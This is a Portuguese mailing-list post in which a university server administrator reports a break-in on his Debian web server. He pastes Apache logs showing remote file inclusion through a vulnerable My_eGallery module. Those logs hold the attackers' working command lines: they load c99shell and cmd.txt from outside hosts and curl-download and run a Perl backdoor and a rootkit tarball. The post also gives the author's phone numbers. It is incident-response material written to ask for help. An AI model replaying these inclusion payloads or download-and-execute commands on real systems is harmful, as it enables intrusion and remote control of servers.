[msg longa] Re: Invadiram servidor e trocaram senha root .... O que fazer???
Marcelo Luiz de Laia wrote:
Ola,
Invadiram o servidor web da APG aqui. Trocaram a senha do root e
comecaram a enviar spam a partir dele. Fui la e despluguei ele da rede.
No entanto, nao sei por onde comecar.
Tive lendo no historico da lista que o melhor seria re-instalar tudo a
partir do zero!!!! Mas, seria isso mesmo necessario?
Outra coisa: onde e o que eu teria que olhar para descobrir algo sobre
o acesso??
Qualquer sugestao me sera util.
Esta instalado o debian estavel sem servidor x.
Obrigado
Ola Pessoal,
So para relatar o que aconteceu depois da invasao.
Recuperei a senha do root com auxilio de um live-cd.
Procurei nos arquivos de log do apache e encontrei o seguinte:
85.107.33.26 - - [28/Apr/2006:20:07:55 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?
HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:07:58 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=home
HTTP/1.1" 200 221
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:00 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=forward
HTTP/1.1" 200 131
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:03 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=up
HTTP/1.1" 200 211
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:05 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=search
HTTP/1.1" 200 262
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:06 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=back
HTTP/1.1" 200 131
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:07 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh
HTTP/1.1" 200 212
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:08 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer
HTTP/1.1" 200 175
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:14 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a
HTTP/1.1" 200 4910
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:17 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh
HTTP/1.1" 200 212
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:19 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=sort_asc
HTTP/1.1" 200 97
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:23 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer
HTTP/1.1" 200 175
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:33 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww
HTTP/1.1" 200 3134
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:43 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww
HTTP/1.1" 200 3134
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:46 -0300] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer
HTTP/1.1" 200 175
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:51 -0300] "POST
/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&
HTTP/1.1" 200 3152
"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:11:35 -0300] "GET
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:39 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2152
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:54 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2032
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:04 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2081
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:12 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2073
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:18 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2161
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:34 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2079
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:42 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2079
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:16:05 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2035
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:18 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2076
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:23 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2161
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:21:12 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 1966
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:13 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2249
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:40 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2052
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:46 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2322
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:15 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2282
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:40 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2703
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:08 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2117
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:19 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2052
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:26:58 -0300] "POST
/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?
HTTP/1.1" 200 2109
"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.69.37.104 - - [29/Apr/2006:03:21:18 -0300] "GET
/modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2
HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:21:29 -0300] "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id
HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:23:52 -0300] "GET
//modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime
HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:23:59 -0300] "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id
HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:24:08 -0300] "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id
HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:24:14 -0300] "GET
//modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash
HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:24:38 -0300] "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=uptime
HTTP/1.1" 200 8780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:25:24 -0300] "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/var/tmp;curl%20-o%20ryo.tar.gz%20http://badboybm.100free.com/ryo.tar.gz;tar%20-zxvf%20ryo.tar.gz;cd%20.access.log;./config%20identd%201988;./run;./f***
HTTP/1.1" 200 9021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:25:55 -0300] "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash
HTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
Descobri que o cara usou esse escript:
http://triton2006.100free.com/cmd.txt
Entao, eu restaurei a senha do root. Rodei um rootkit para ver se havia
alguma mudanca. Nao encontrou nada.
Desabilitei o modulo My_eGallery do site e pus um script no profile do
root para me avisar quando alguem efetivasse login como root.
Pois bem, depois de duas semanas alguem efetuou login como root novamente:
detectado em apg
O usuário <<< root >>> efetuou login no servidor.
Máquina acessada: apg.
Data do acesso: Sex Jun 23 13:35:28 BRT 2006.
IP do acesso: 201.78.50.60 4001 6336.
TTY: /dev/pts/0
Desliguei o cabo de rede imediatamente!
Agora, eu gostaria de saber como relatar esses numeros de IPs para as autoridades, etc...
--
Marcelo Luiz de Laia
Ph.D Candidate
São Paulo State University (http://www.unesp.br/eng/)
School of Agricultural and Veterinary Sciences
Department of Technology
Via de Acesso Prof.Paulo Donato Castellane s/n
14884-900 Jaboticabal - SP - Brazil
Fone: +55-016-3209-2675
Cell: +55-016-97098526
Reply to: